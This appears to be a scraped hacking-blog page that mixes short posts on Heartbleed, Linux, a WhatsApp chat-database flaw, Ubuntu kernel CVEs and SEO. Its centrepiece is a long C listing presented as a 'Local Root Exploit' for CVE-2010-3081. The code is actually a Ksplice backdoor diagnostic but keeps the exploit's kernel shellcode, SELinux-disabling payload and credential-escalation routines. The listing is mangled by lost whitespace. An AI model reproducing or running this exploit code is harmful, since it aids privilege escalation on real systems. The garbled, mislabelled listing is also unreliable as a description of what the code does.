How to patch your server against The Heartbleed Bug

How to patch your server against The Heartbleed Bug

What is the Heartbleed Bug?

The Heartbleed Bug is a serious vulnerability in the popular OpenSSL cryptographic software library… rad more

Advertisements

How to Copy Text from a Protected Web Page

Sometimes websites have a security feature in place that protects the text of the website to prevent users from stealing site content. But websites aren’t around forever and sometimes ……read more

WHY HACKERS PREFER LINUX?

LINUX CODING


Linux use is growing at an amazing rate. This operating system, which has no public relations department, advertising, or government lobby, is being used widely in homes and server rooms alike. It’s also free, and 100% open source, meaning anyone can look at each and every line of code in the Linux kernel.
Linux is a true multiuser operating system, and has been since the very first version. It is powerful in it’s simplicity. Though there are robust graphical environments and tools, you can still do everything you could possibly need with just a keyboard and a shell prompt. Since you have the code, you could even make Linux do things it was never meant to.

That’s one of the things that draws both the gurus and the attackers alike.
The black-hats have thronged to Linux. It allows them the control they require to do strange and ingenious things. If they want to experiment with new or invalid network packets, they can do so easily without relying on undocumented (or non-existant) API support from the vendor.
Millions of lines of code have been written for Linux applications and libraries, usually in an extremely modular manner, which allows it to be integrated into widely diverse projects. For example a library that allows you to sniff the network for proactive performance monitoring could be used as part of network hijacking code.

The power and flexibility of Linux makes it the hacker’s playground. They use it, learn it, and understand it intimately. And that means that if there’s an insecurity, they’re going to find it.
However the very reasons the hackers like Linux are the same reasons more folks are installing it on their own systems today. The ability to look at each and every line of Linux code, and patch it when problems arise, means that Linux can be secured not just by a few programmers locked away in some corporate headquarters, but by any user at any time..

kernel-2.6.18-164 2010 Local Root Exploit

Kernel-2.6.18-164 2010 Local Root Exploit
Save this code as a c program file.
Code:

/*
kernel-2.6.18-164 2010 Local Root Exploit
=========================================
# Author: Hackeri-AL
# Email : h-al [at] hotmail [dot] it
# Group : UAH / United ALBANIA Hackers
# Web   : uah1.org.uk
# Greetz: LoocK3D - b4cKd00r ~
--------------------------------------------
Diagnostic test for CVE-2010-3081 public exploit
Greg Price, Ksplice, Inc.
Tests whether the system has previously been exposed to the exploit
published as "hackerial.c" by Hackeri-AL on 2010 Sep 15.  Based on the
original exploit code.
For more information, see
  http://www.ksplice.com/uptrack/cve-2010-3081
  
  Source: http://inj3ct0r.com/exploits/14333
*/#include<poll.h>#include<string.h>#include<unistd.h>#include<sys/types.h>#include<stdlib.h>#include<sys/wait.h>#include<sys/utsname.h>#include<sys/socket.h>#include<sched.h>#include<netinet/in.h>#include<stdio.h>#include<sys/stat.h>#include<fcntl.h>#include<sys/mman.h>#include<sys/ipc.h>#include<sys/msg.h>#include<sys/resource.h>#include<errno.h>#define _GNU_SOURCE
#define __dgdhdytrg55 unsignedint#define __yyrhdgdtfs66ytgetrfd unsignedlonglong#define __dhdyetgdfstreg__ memcpy
#define BANNER "Diagnostic tool forpublic CVE-2010-3081 exploit --Ksplice,Inc." 
               "(see http://www.ksplice.com/uptrack/cve-2010-3081)" 
               ""#define KALLSYMS              "/proc/kallsyms"#define TMAGIC_66TDFDRTS      "/proc/timer_list"#define SELINUX_PATH          "/selinux/enforce"#define RW_FOPS               "timer_list_fops"#define PER_C_DHHDYDGTREM7765 "per_cpu__current_task"#define PREPARE_GGDTSGFSRFSD  "prepare_creds"#define OVERRIDE_GGDTSGFSRFSD "override_creds"#define REVERT_DHDGTRRTEFDTD  "revert_creds"#define Y0Y0SMAP              0x100000UL#define Y0Y0CMAP              0x200000UL#define Y0Y0STOP              (Y0Y0SMAP+0xFFC)#define J0J0S                 0x00200000UL#define J0J0R00T              0x002000F0UL#define PAGE_SIZE             0x1000#define KERN_DHHDYTMLADSFPYT     0x1#define KERN_DGGDYDTEGGETFDRLAK  0x2#define KERN_HHSYPPLORQTWGFD     0x4#define KERN_DIS_GGDYYTDFFACVFD_IDT      0x8#define KERN_DIS_DGDGHHYTTFSR34353_FOPS     0x10#define KERN_DIS_GGDHHDYQEEWR4432PPOI_LSM      0x20#define KERN_DIS_GGSTEYGDTREFRET_SEL1NUX  0x40#define isRHHGDPPLADSF(ver)(strstr(ver,".el4")|| strstr(ver,".el5"))#define __gggdfstsgdt_dddex(f, a...)do{ fprintf(stdout, f,## a); } while(0)#define __pppp_tegddewyfg(s)do{ fprintf(stdout,"%s", s);}while(0)/* #define __print_verbose(s) do { fprintf(stdout, "%s", s); } while(0) */#define __print_verbose(s)do{}while(0)#define __xxxfdgftr_hshsgdt(s)do{ perror(s);exit(-1);}while(0)#define __yyy_tegdtfsrer(s)do{ fprintf(stderr, s);exit(-1);}while(0)staticchar buffer[1024];staticint s;staticint flags=0;volatilestaticsocklen_t magiclen=0;staticint useidt=1, usefops=0, uselsm=0;static __yyrhdgdtfs66ytgetrfd _m_fops=0,_m_cred[3]={0,0,0};static __dgdhdytrg55 _m_cpu_off=0;staticchar krelease[64];staticchar kversion[128];#define R0C_0FF 14staticchar ttrg0ccc[]="x51x57x53x56x48x31xc9x48x89xf8x48x31xf6xbex41x41x41x41"  
"x3bx30x75x1fx3bx70x04x75x1ax3bx70x08x75x15x3bx70x0c"   
"x75x10x48x31xdbx89x18x89x58x04x89x58x08x89x58x0cxebx11"     
"x48xffxc0x48xffxc1x48x81xf9x4cx04x00x00x74x02"                   
"xebxccx5ex5bx5fx59xc3";               

#define R0YTTTTUHLFSTT_OFF1 5#define R0YGGSFDARTDF_DHDYTEGRDFD_D 21#define R0TDGFSRSLLSJ_SHSYSTGD 45char r1ngrrrrrrr[]="x53x52x57x48xbbx41x41x41x41x41x41x41x41xffxd3"                                 
"x50x48x89xc7x48xbbx42x42x42x42x42x42x42x42"  
"xffxd3x48x31xd2x89x50x04x89x50x14x48x89xc7"                              
"x48xbbx43x43x43x43x43x43x43x43"   
"xffxd3x5fx5fx5ax5bxc3";                                       

#define RJMPDDTGR_OFF 13#define RJMPDDTGR_DHDYTGSCAVSF 7#define RJMPDDTGR_GDTDGTSFRDFT 25staticchar ttrfd0[]="x57x50x65x48x8bx3cx25x00x00x00x00""x48xb8x41x41x41x41x41x41x41x41xffxd0"                      
"x58x5f""x90x90x90x90x90x90x90x90x90x90""x90x90x90x90x90x90x90x90x90x90""x90x90x90x90x90x90x90x90x90x90""x90x90x90x90x90x90x90x90x90x90""x90x90x90x90x90x90x90x90x90x90""xc3";/* implement selinux bypass for IDT ! */#define RJMPDDTGR_OFF_IDT 14#define RJMPDDTGR_DYHHTSFDARE 8#define RJMPDDTGR_DHDYSGTSFDRTAC_SE 27staticchar ruujhdbgatrfe345[]="x0fx01xf8x65x48x8bx3cx25x00x00x00x00"      
"x48xb8x41x41x41x41x41x41x41x41xffxd0"                                  
"x0fx01xf8""x90x90x90x90x90x90x90x90x90x90""x90x90x90x90x90x90x90x90x90x90""x90x90x90x90x90x90x90x90x90x90""x90x90x90x90x90x90x90x90x90x90""x90x90x90x90x90x90x90x90x90x90""x48xcf";  

#define CJE_4554TFFDTRMAJHD_OFF  10#define RJMPDDTGR_AYYYDGTREFCCV7761_OF      23staticchar dis4blens4sel1nuxhayettgdr64545[]="x41x52x50""xb8x00x00x00x00""x49xbax41x41x41x41x41x41x41x41""x41x89x02""x49xbax42x42x42x42x42x42x42x42""x41x89x02""x58x41x5a";           


/* rhel LSM stuffs */#define RHEL_LSM_OFF 98struct LSM_rhel 
{ 
  __yyrhdgdtfs66ytgetrfd selinux_ops;
  __yyrhdgdtfs66ytgetrfd capability_ops;
  __yyrhdgdtfs66ytgetrfd dummy_security_ops;
  __yyrhdgdtfs66ytgetrfd selinux_enforcing;
  __yyrhdgdtfs66ytgetrfd audit_enabled;
  constchar*krelease; 
  constchar*kversion;};struct LSM_rhel known_targets[4]={
  {
    0xffffffff8031e600ULL,
    0xffffffff8031fec0ULL,
    0xffffffff804acc00ULL,
    0xffffffff804af960ULL,
    0xffffffff8049b124ULL,
    "2.6.18-164.el5",
    "#1 SMP ThuSep303:28:30 EDT 2009"  // to manage minor/bug fix changes
  },
  {
   0xffffffff8031f600ULL,
   0xffffffff80320ec0ULL,
   0xffffffff804afc00ULL,
   0xffffffff804b2960ULL,
   0xffffffff8049e124ULL,
   "2.6.18-164.11.1.el5",
   "#1 SMP WedJan613:26:04 EST 2010"
  },
  {
    0xffffffff805296a0ULL,
    0xffffffff8052af60ULL,
    0xffffffff806db1e0ULL,
    0xffffffff806ddf40ULL,
    0xffffffff806d5324ULL,
    "2.6.18-164.11.1.el5xen",
    "#1 SMP WedJan2008:06:04 EST 2010"   // default xen
  },
  {
    0xffffffff8031f600ULL,// d selinux_ops
    0xffffffff80320ec0ULL,// d capability_ops
    0xffffffff804afc00ULL,// B dummy_security_ops
    0xffffffff804b2960ULL,// B selinux_enforcing
    0xffffffff8049e124ULL,// B audit_enabled
    "2.6.18-164.11.1.el5",
    "#1 SMP WedJan2007:32:21 EST 2010"// tripwire target LoL
   }};staticstruct LSM_rhel *curr_target=NULL, dyn4nt4n1labeggeyrthryt;staticint isSelinuxEnabled(){
  FILE *selinux_f;
  selinux_f = fopen(SELINUX_PATH,"r");
  if(selinux_f == NULL)
  {
    if(errno == EPERM)
      return1;
    else 
     return0;
  }
  fclose(selinux_f);
  return1;}staticint wtfyourunhere_heee(char*out_release,char* out_version){
 int ret;constchar*ptr;
 int count=0;
 char r[32],*bptr;
 struct utsname buf;
 ret =  uname(&buf);
 if(ret <0)
   return-1; 

 strcpy(out_release, buf.release);
 strcpy(out_version, buf.version);
 ptr = buf.release;
 bptr = r;
 memset(r,0x00,sizeof(r)); 
 while(*ptr)
 {
   if(count ==2)
    {
      if(*ptr >='0'&&*ptr <='9')
        *bptr++=*ptr;
      else
        break;
    }

   if(*ptr =='.')
     count++;
   ptr++;
 }
 if(strlen(r)<1||!atoi(r))
   return-1; 
 return atoi(r);}staticvoid p4tch_sel1nux_codztegfaddczda(struct LSM_rhel *table){
  *((__yyrhdgdtfs66ytgetrfd *)(dis4blens4sel1nuxhayettgdr64545 + CJE_4554TFFDTRMAJHD_OFF))= table->selinux_enforcing;
  *((__yyrhdgdtfs66ytgetrfd *)(dis4blens4sel1nuxhayettgdr64545 + RJMPDDTGR_AYYYDGTREFCCV7761_OF))= table->audit_enabled;
  __dhdyetgdfstreg__(ttrfd0 + RJMPDDTGR_GDTDGTSFRDFT, dis4blens4sel1nuxhayettgdr64545,sizeof(dis4blens4sel1nuxhayettgdr64545)-1); 
  __dhdyetgdfstreg__(ruujhdbgatrfe345 + RJMPDDTGR_DHDYSGTSFDRTAC_SE, dis4blens4sel1nuxhayettgdr64545,sizeof(dis4blens4sel1nuxhayettgdr64545)-1);}static __yyrhdgdtfs66ytgetrfd get_sym_ex(constchar* s,constchar* filename,int ignore_flag){
  FILE *ka;
  char line[512];
  char reloc_a[64];
  char reloc[64];
  if(!(flags & KERN_HHSYPPLORQTWGFD)&&!ignore_flag)
    return0;
  
  ka = fopen(filename,"r");
  if(!ka)
    return0;
  while(fgets(line,512, ka)!= NULL)
  {
    char*l_p  = line;
    char*ra_p = reloc_a;
    char*r_p    = reloc;
    memset(reloc,0x00,sizeof(reloc));
    memset(reloc_a,0x00,sizeof(reloc_a));
    while(*l_p !=''&&(ra_p - reloc_a)  <64)
      *ra_p++=*l_p++;  
    l_p +=3;
    while(*l_p !=''&&*l_p !=''&&*l_p !=' '&&(r_p - reloc)<64)
      *r_p++=*l_p++;
    if(!strcmp(reloc, s))
    {
      return strtoull(reloc_a, NULL,16); 
    }
  }
  return0;}staticinline __yyrhdgdtfs66ytgetrfd get_sym(constchar* s){
  return get_sym_ex(s, KALLSYMS,0);}staticint parse_cred(constchar* val){
  int i=0;
  constchar* p = val;
  charlocal[64],*l;
  for(i=0; i<3; i++)  
  {
    memset(local,0x00,sizeof(local));
    l =local;
    while(*p &&*p !=',')
      *l++=*p++;
    if(!(*p)&& i !=2)
      return-1;
    _m_cred[i]= strtoull(local, NULL,16);
    p++;
  }

  return0;}#define SELINUX_OPS        "selinux_ops"#define DUMMY_SECURITY_OPS "dummy_security_ops"#define CAPABILITY_OPS     "capability_ops"#define SELINUX_ENFORCING  "selinux_enforcing"#define AUDIT_ENABLED      "audit_enabled"struct LSM_rhel *lsm_rhel_find_target(int check_rhel){
   int i;
   char mapbuf[128];
   struct LSM_rhel *lsm =&(known_targets[0]);
   if(check_rhel &&!isRHHGDPPLADSF(krelease))
   {
     __pppp_tegddewyfg("!!!Not a RHEL kernel, will skip LSM method 
");
     return NULL;
   }
   __print_verbose("$$$ Lookingfor known RHEL kernels..");
   for(i=0; i<sizeof(known_targets)/sizeof(struct LSM_rhel); i++, lsm++)
   {
     if(!strcmp(krelease, lsm->krelease)&&!strcmp(kversion, lsm->kversion))
     {
       __gggdfstsgdt_dddex("$$$ Known target kernel:%s %s 
", lsm->krelease, lsm->kversion);
       return lsm;
     }
   }
   __print_verbose("$$$ Locating symbols fornew target...");
   strcpy(mapbuf,"/boot/System.map-");
   strcat(mapbuf, krelease);
   dyn4nt4n1labeggeyrthryt.selinux_ops        = get_sym_ex(SELINUX_OPS, mapbuf,1);
   dyn4nt4n1labeggeyrthryt.dummy_security_ops = get_sym_ex(DUMMY_SECURITY_OPS, mapbuf,1);
   dyn4nt4n1labeggeyrthryt.capability_ops     = get_sym_ex(CAPABILITY_OPS, mapbuf,1);
   dyn4nt4n1labeggeyrthryt.selinux_enforcing  = get_sym_ex(SELINUX_ENFORCING, mapbuf,1);
   dyn4nt4n1labeggeyrthryt.audit_enabled      = get_sym_ex(AUDIT_ENABLED, mapbuf,1);

   if(!dyn4nt4n1labeggeyrthryt.selinux_ops ||
      !dyn4nt4n1labeggeyrthryt.dummy_security_ops ||
      !dyn4nt4n1labeggeyrthryt.capability_ops ||
      !dyn4nt4n1labeggeyrthryt.selinux_enforcing ||
      !dyn4nt4n1labeggeyrthryt.audit_enabled)
 return NULL;

   return&dyn4nt4n1labeggeyrthryt;}void error_no_symbol(constchar*symbol){
  fprintf(stderr,
          "!!!Couldnot find symbol:%s
"
          ""
          "A symbol required by the published exploit for CVE-2010-3081isnot"
          "provided by your kernel.  The exploit would not work on your system.",
          symbol);
  exit(-1);}staticvoid put_your_hands_up_hooker(int argc,char*argv[]){
  int fd,ver,ret;
  char __b[16];

  fd = open(KALLSYMS, O_RDONLY);
  ret = read(fd, __b,16);// dummy read
  if((fd >=0&& ret >0))
  {
    __print_verbose("$$$ can read /proc/kallsyms, will usefor convenience
");// d0nt p4tch m3 br0
    flags |= KERN_HHSYPPLORQTWGFD;
  }
  close(fd);
  ver = wtfyourunhere_heee(krelease, kversion);
  if(ver <0)
    __yyy_tegdtfsrer("!!! uname failed
");
  __gggdfstsgdt_dddex("$$$ Kernel release:%s
", krelease);

  if(argc !=1)
  {
    while((ret = getopt(argc, argv,"sflc:k:o:"))>0)
    {
      switch(ret)
      {
        case'f':
          flags |= KERN_DIS_GGDHHDYQEEWR4432PPOI_LSM|KERN_DIS_GGDYYTDFFACVFD_IDT;
          break;

 case'l':
   flags |= KERN_DIS_GGDYYTDFFACVFD_IDT|KERN_DIS_DGDGHHYTTFSR34353_FOPS;
   break;
        case'c':
          if(!optarg || parse_cred(optarg)<0)
              __yyy_tegdtfsrer("!!!Unable to parse cred codes
");
          break;
        case'k':
          if(optarg)
            _m_fops = strtoull(optarg, NULL,16);
          else
      __yyy_tegdtfsrer("!!!Unable to parse fops numbers
");
          break;
        case's':
          if(!isSelinuxEnabled())
            __pppp_tegddewyfg("???-s ignored:SELinuxnot enabled
");
          else
            flags |= KERN_DIS_GGSTEYGDTREFRET_SEL1NUX;
          break;
            
        case'o':
          if(optarg)
            _m_cpu_off = strtoull(optarg, NULL,16);
   else
     __yyy_tegdtfsrer("!!!Unable to parse cpu_off numbers
");
          break;
      }
    }
  }

  if(ver >=29)// needs cred structure 
  {
    flags |= KERN_DGGDYDTEGGETFDRLAK;
  
    if(!_m_cred[0]||!_m_cred[1]||!_m_cred[2])
    {
      _m_cred[0]= get_sym(PREPARE_GGDTSGFSRFSD);
      _m_cred[1]= get_sym(OVERRIDE_GGDTSGFSRFSD); 
      _m_cred[2]= get_sym(REVERT_DHDGTRRTEFDTD);
    }
    if(!_m_cred[0])
      error_no_symbol("prepare_creds");
    if(!_m_cred[1])
      error_no_symbol("override_creds");
    if(!_m_cred[2])
      error_no_symbol("revert_creds");
    
    __print_verbose("$$$ Kernel credentials detected
");
    *((__yyrhdgdtfs66ytgetrfd *)(r1ngrrrrrrr + R0YTTTTUHLFSTT_OFF1))= _m_cred[0];
    *((__yyrhdgdtfs66ytgetrfd *)(r1ngrrrrrrr + R0YGGSFDARTDF_DHDYTEGRDFD_D))= _m_cred[1];
    *((__yyrhdgdtfs66ytgetrfd *)(r1ngrrrrrrr + R0TDGFSRSLLSJ_SHSYSTGD))= _m_cred[2];
  }
  if(ver >=30)  // needs cpu offset
  {
    flags |= KERN_DHHDYTMLADSFPYT;
    if(!_m_cpu_off)
    _m_cpu_off =(__dgdhdytrg55)get_sym(PER_C_DHHDYDGTREM7765);
    if(!_m_cpu_off)
      error_no_symbol("per_cpu__current_task");
    __print_verbose("$$$ Kernel per_cpu relocs enabled
");
    *((__dgdhdytrg55 *)(ttrfd0 + RJMPDDTGR_DHDYTGSCAVSF))= _m_cpu_off;
    *((__dgdhdytrg55 *)(ruujhdbgatrfe345 + RJMPDDTGR_DYHHTSFDARE))= _m_cpu_off;
  }}staticvoid env_prepare(int argc,char* argv[]){
  put_your_hands_up_hooker(argc, argv);
  if(!(flags & KERN_DIS_DGDGHHYTTFSR34353_FOPS))  // try fops
  {
    __print_verbose("???Trying the timer_list_fops method
");
    if(!_m_fops)
      _m_fops = get_sym(RW_FOPS);
    /* TODO: do RW check for newer -mm kernels which has timer_list_struct RO
     * Thanks to the guy who killed this vector... you know who you are:)
     * Lucky for you, there are more:) 
     */
    if(_m_fops) 
    {
      usefops=1;
    }
  }

  if(!(flags & KERN_DIS_GGDHHDYQEEWR4432PPOI_LSM))// try lsm(rhel)
  {
    __print_verbose("???Trying the LSM method
");
    curr_target = lsm_rhel_find_target(1);
    if(!curr_target)
    {
       __print_verbose("!!!Unable to find target for LSM method
"); 
    }
    else{
      uselsm=1;
    }
  }

  if(useidt &&(flags & KERN_DIS_GGSTEYGDTREFRET_SEL1NUX))
  {
    // -i flag
    curr_target = lsm_rhel_find_target(0);
    if(!curr_target)
    {
       __pppp_tegddewyfg("!!!Unable to find target:continue without SELinux disabled
");
       /* remove Selinux Flag */
       flags &=~KERN_DIS_GGSTEYGDTREFRET_SEL1NUX;
    }
  }

  if(!usefops &&!useidt &&!uselsm)
    __yyy_tegdtfsrer("!!!All exploit methods failed.");  
}staticinlineint get_socklen(__yyrhdgdtfs66ytgetrfd addr, __dgdhdytrg55 stack){
  int socklen_l =8+ stack - addr -16;
  return socklen_l;}staticvoid __setmcbuffer(__dgdhdytrg55 value){
  int i;
  __dgdhdytrg55 *p =(__dgdhdytrg55*)buffer;
  for(i=0; i<sizeof(buffer)/sizeof(void*); i++)
    *(p+i)= value;}staticvoid y0y0stack(){
  void* map = mmap((void*)Y0Y0SMAP, 
                   PAGE_SIZE, 
                   PROT_READ|PROT_WRITE, 
                   MAP_ANONYMOUS|MAP_PRIVATE|MAP_FIXED, 
                   -1,0);
  if(MAP_FAILED == map)
    __xxxfdgftr_hshsgdt("mmap");}staticvoid y0y0code(){
  void* map = mmap((void*)Y0Y0CMAP, 
                   PAGE_SIZE,#ifdef TRY_REMAP_DEFAULT 
     PROT_READ|PROT_WRITE,#else
                   PROT_READ|PROT_WRITE|PROT_EXEC,#endif
                   MAP_ANONYMOUS|MAP_PRIVATE|MAP_FIXED, 
                   -1,0);
  if(MAP_FAILED == map)
    __xxxfdgftr_hshsgdt("mmap");}staticint rey0y0code(unsignedlong old){
  int fd;
  void*map;
  volatilechar wizard;
  char cwd[1024];
  getcwd(cwd,sizeof(cwd));  
  strcat(cwd,"/__tmpfile");

  unlink(cwd);
  fd = open(cwd, O_RDWR|O_CREAT, S_IRWXU);
  if(fd <0)
    return-1; 
  write(fd,(constvoid*)old, PAGE_SIZE); 
  if(munmap((void*)old, PAGE_SIZE)<0)
    return-1;
  map = mmap((void*)old, 
                   PAGE_SIZE, 
                   PROT_READ|PROT_EXEC, 
                   MAP_PRIVATE|MAP_FIXED, 
                   fd,0);
  if(map == MAP_FAILED)
    return-1; 

  /* avoid lazy page fault handler 
   * Triple Fault when using idt vector 
   * and no pages are already mapped:)
   */
  wizard =*((char*)old);
  unlink(cwd);
  return wizard;}void finish_shellcode(){ 
  /* set shellcode level 2 */
  if(flags & KERN_DGGDYDTEGGETFDRLAK)
  {
    __print_verbose("$$$ Using cred shellcode
");
    __dhdyetgdfstreg__((void*)J0J0R00T, r1ngrrrrrrr,sizeof(r1ngrrrrrrr));
  }
  else
  {
    __print_verbose("$$$ Using standard shellcode
");
    __dhdyetgdfstreg__((void*)J0J0R00T,  ttrg0ccc,sizeof(ttrg0ccc));
    *((unsignedint*)(J0J0R00T + R0C_0FF))= getuid();
  }#ifdef TRY_REMAP_DEFAULT
  if(rey0y0code(Y0Y0CMAP)<0)
    __yyy_tegdtfsrer("!!!Unable to remap
");#endif}int method_idt_main(){
  __yyrhdgdtfs66ytgetrfd *patch;
  __print_verbose("$$$ Building shellcode - IDT method
");   
  patch =(__yyrhdgdtfs66ytgetrfd*)(ruujhdbgatrfe345 + RJMPDDTGR_OFF_IDT);
  *patch =(__yyrhdgdtfs66ytgetrfd)(J0J0R00T);
  if(flags & KERN_DIS_GGSTEYGDTREFRET_SEL1NUX)
  {
    __print_verbose("$$$ including code to disable SELinux");
    p4tch_sel1nux_codztegfaddczda(curr_target);
  }
    
  __dhdyetgdfstreg__((void*)J0J0S,  ruujhdbgatrfe345,sizeof(ruujhdbgatrfe345));
  finish_shellcode();
  asmvolatile("int $0xdd
");
  return(getuid()==0);}int method_idt(){
  /* method_idt_main() crashes if no backdoor is present, so protect ourselves */
  int pid;
  pid = fork();
  if(pid <0){
    __xxxfdgftr_hshsgdt("!!! fork() failed");
    return0;// error
  }
  if(pid ==0){
    int r;
    struct rlimit rlim ={0,0};
    setrlimit(RLIMIT_CORE,&rlim);
    r = method_idt_main();
    exit(r ?0:1);
  }
  int status;
  waitpid(pid,&status,0);
  if(status ==0)
    return method_idt_main();
  else
    return0;}void prepare_fops_lsm_shellcode(){
  __yyrhdgdtfs66ytgetrfd *patch;
  __print_verbose("$$$ Building shellcode - fops/LSM method
");   
  patch =(__yyrhdgdtfs66ytgetrfd*)(ttrfd0 + RJMPDDTGR_OFF);
  *patch =(__yyrhdgdtfs66ytgetrfd)(J0J0R00T);
  __setmcbuffer(J0J0S);
  if(uselsm &&(flags & KERN_DIS_GGSTEYGDTREFRET_SEL1NUX))
  {
      __print_verbose("$$$ including code to disable SELinux");
      p4tch_sel1nux_codztegfaddczda(curr_target);
  } 
  __dhdyetgdfstreg__((void*)J0J0S, ttrfd0,sizeof(ttrfd0));
  finish_shellcode();}int method_fops(){
  int fd;
  struct pollfd pfd;
  prepare_fops_lsm_shellcode();
  fd = open(TMAGIC_66TDFDRTS, O_RDONLY);
  if(fd <0)
    __xxxfdgftr_hshsgdt("!!! could not open /proc/timer_list");
  
  pfd.fd = fd;
  pfd.events = POLLIN | POLLOUT;
  poll(&pfd,1,0);
  return(getuid()==0);}int method_lsm(){
  int msqid;
  prepare_fops_lsm_shellcode();
  msqid = msgget(0, IPC_PRIVATE|0600);
  if(msqid <0)
    __xxxfdgftr_hshsgdt("!!! msgget() failed");
  msgctl(msqid, IPC_RMID,(struct msqid_ds *) NULL);// exploit it
  return(getuid()==0);}int main(int argc,char*argv[]){
  intdone;
  printf(BANNER);
  if(getuid()==0){
    fprintf(stderr,"!!!Must run as non-root.");
    return1;
  }
  env_prepare(argc, argv);
  y0y0stack(); 
  y0y0code();
  done=0;
  __pppp_tegddewyfg("$$$ Backdoorin LSM (1/3):");
  if(uselsm){
    __pppp_tegddewyfg("checking...");
    done= method_lsm();
    if(done)
      __pppp_tegddewyfg("PRESENT
");
    else
      __pppp_tegddewyfg("not present.");
  }else{
    __pppp_tegddewyfg("not available.");
  }
  if(!done){
    __pppp_tegddewyfg("$$$ Backdoorin timer_list_fops (2/3):");
    if(usefops){
      __pppp_tegddewyfg("checking...");
      done= method_fops();
      if(done)
        __pppp_tegddewyfg("PRESENT
");
      else
        __pppp_tegddewyfg("not present.");
    }else{
      __pppp_tegddewyfg("not available.");
    }
  }
  if(!done){
    __pppp_tegddewyfg("$$$ Backdoorin IDT (3/3):");
    if(useidt){
      __pppp_tegddewyfg("checking...");
      fflush(stdout);
      done= method_idt();
      if(done)
        __pppp_tegddewyfg("PRESENT
");
      else
        __pppp_tegddewyfg("not present.");
    }else{
      __pppp_tegddewyfg("NOT CHECKING
");
    }
  }
  munmap((void*)Y0Y0CMAP, PAGE_SIZE);
  /* exec */
  if(getuid()==0)
  {
    pid_t pid;
    printf(""
           "Yourin-memory kernel HAS A BACKDOOR that may have been left
"
           "by the published exploit for CVE-2010-3081."
           ""
           "More information is available at
"
           "  http://www.ksplice.com/uptrack/cve-2010-3081"
           );
    if(0){
      /* spawn root shell as demonstration */
      pid = fork();
      if(pid ==0)
      {
        char*args[]={"/bin/sh","-i", NULL};
        char*envp[]={"TERM=linux","BASH_HISTORY=/dev/null","HISTORY=/dev/null","history=/dev/null","HISTFILE=/dev/null","HISTFILESIZE=0",
                        "PATH=/bin:/sbin:/usr/sbin:/usr/bin:/usr/local/bin:/usr/local/sbin", NULL };
        execve("/bin/sh", args, envp);
      } 
      else  
      {
        int status;
        waitpid(pid,&status,0);
      }
    }
  }
  else{
    printf(""
           "Your system is free from the backdoors that would be left in memory
"
           "by the published exploit for CVE-2010-3081.");
  }
  close(s);
  return0;}

New Vulnerability found in WhatsApp, read private chats

New Vulnerability found in WhatsApp

A security consultant has uncovered a security hole in WhatsApp, the instant messaging platform recently acquired by Facebook. The flaw can be leveraged to gain access to the private chats of Android device owners.
Many people are concerned with the privacy implications that come with Facebook’s acquisition of WhatsApp. However, as Bas Bosschert, the man who identified the vulnerability, highlights, Facebook didn’t need to buy the company if all it wanted to do was read users’ chats.
The expert has found that any Android app that’s allowed access to the SD card installed on the device can easily access private conversations. 
All chats are saved in a database file (msgstore.db) that’s stored on the SD card. Bosschert has developed aproof-of-concept which demonstrates that any app that’s granted permission to access the card can easily retrieve the database and upload it to a remote server.
According to Bosschert, in newer versions of WhatsApp, the database file is encrypted. However, this doesn’t mean that users’ private chats are secure. It simply means that an attacker would have to decrypt the database file to gain access to its contents.
The decryption key can be found in WhatsApp Xtract, an app that allows users to create backups of WhatsApp conversations.
The POC developed by the expert is designed so that when the database is retrieved, the victim only sees a simple loading screen. Cybercriminals could combine the data-stealing code with a popular application to harvest a large number of databases. 
In February, security researchers from Praetorian revealed finding a number of SSL-related vulnerabilities in WhatsApp. Most of them were fixed almost immediately by the company. 
Source: Softpedia

Ubuntu 13.10 Kernel Exploit

Ubuntu 13.10 Kernel Exploit

A security issue affects Ubuntu 13.10 releases of Ubuntu and its derivatives
Saran Neti reported a flaw in the ipv6 UDP Fragmentation Offload (UFI) in the Linux kernel. A remote attacker could exploit this flaw to cause a denial of service (panic). (

CVE-2013-4563

)
Mathy Vanhoef discovered an error in the the way the ath9k driver was handling the BSSID masking. A remote attacker could exploit this error to discover the original MAC address after a spoofing attack. (

CVE-2013-4579

 )
Andrew Honig reported a flaw in the Linux Kernel’s kvm_vm_ioctl_create_vcpu function of the Kernel Virtual Machine (KVM) subsystem. A local user could exploit this flaw to gain privileges on the host machine. (

CVE-2013-4587

) Various other issues were also addressed.
Andrew Honig reported a flaw in the apic_get_tmcct function of the Kernel Virtual Machine (KVM) subsystem if the Linux kernel. A guest OS user could exploit this flaw to cause a denial of service or host OS system crash. (

CVE-2013-6367

)
Andrew Honig reported an error in the Linux Kernel’s Kernel Virtual Machine (KVM) VAPIC synchronization operation. A local user could exploit this flaw to gain privileges or cause a denial of service (system crash).
Source:Ubuntu

How to Analysis your website for search engine optimization


    1. If Web page has a “0” Google™ PageRank™. PageRank™ denotes a Website’s importance in the eyes of Google™.

  • Fact: If you are not on the first page of search results, over 60% of Internet users will not find you!
  • If Title Tag contains too many characters for what we consider a “robot friendly” Web page. The maximum number of characters we recommend for this Tag is 60.
  • Fact: Alll major search engines including Google, Yahoo!, Scrub The Web, MSN Bing and others utilize Meta Tags! Don’t take our word for it
  • If Meta Description Tag contains too many characters for what we consider a “robot friendly” Web page. The maximum number of characters we recommend for this Tag is 150.
  • Fact: Having search engine friendly Title and Meta Tags is the most basic step toward search engine optimization (SEO)
  • For The Meta Keywords Tag. Our recommended maximum number of characters for this tag is 874. Although we would never recommend you use this entire allowance because you may then suffer from keyword saturation.
Myth: “Nobody needs search engine optimization.”
 
Truth: More than 80% of Internet users use search engines to find what they are looking for. Therefore any Website wanting new visitors needs search engine optimization.
 
Myth: “Submitting to search engines means everyone on the Internet will find you.”
 
Truth: People are not going to find you in search engines just because you submitted to them. If you truly want to capture your fair share and more of search engine traffic, you must optimize your Web pages. SEO plays an important role in your ability to succeed on the Internet.
refrence hackerschronicle